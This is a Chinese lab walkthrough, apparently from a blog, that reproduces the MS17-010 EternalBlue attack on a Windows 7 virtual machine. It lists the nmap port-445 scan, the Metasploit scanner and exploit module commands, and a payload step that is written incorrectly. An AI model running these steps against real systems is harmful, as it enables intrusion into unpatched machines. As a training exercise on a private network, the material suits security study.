zoukankan      html  css  js  c++  java
  • remote pc ms17-010

    我们将使用以下工具对此进行演示

    • 厉害的Linux
    • win7
    • VMware或VirtualBox(虚拟环境)

    注意:此实验仅用于教育目的,任何非法活动概不负责。

    测试目的:

    通过实施针对性的渗透测试,发现win7系统的安全漏洞,复现ms17-010,熟悉渗透测试流程。

    测试范围:

    本次测试的范围详细如下:

    系统名称 未知
    测试时间 2020.10.24
    测试工具 kali linux
    说明 本次渗透测试过程中使用网络环境为私有内网

    数据来源:

    通过漏洞扫描和手动分析获取相关数据。

    全网搜索445端口

    nmap -p 445 192.168.31.0/24

     搜索ms17-010

    auxiliary模块 检查漏洞: 

    use 1 或者use auxiliary/scanner/smb/smb_ms17_010 

    发现漏洞存在 

    渗透利用:

    搜索ms17-010 :search ms17-010

    使用exploit永恒之蓝设置参数: use 2 或exploit/windows/smb/ms17-010_eternalblue

    设置攻击负载:set payload 2 或者 set payload exploit/windows/smb/ms17-010_eternalblue

     

     攻击成功:

     

    后渗透:

     

     

     

  • 相关阅读:
    第四十三课:jQuery插件化
    js模块化开发
    第四十二课:基于CSS的动画引擎
    第四十一课:CSS3 animation详解
    第四十课:CSS3 transition详解
    第三十九课:requestAnimationFrame详解
    几种排序
    图与搜索
    数组
    链表
  • 原文地址:https://www.cnblogs.com/donglian1/p/13871059.html
Copyright © 2011-2022 走看看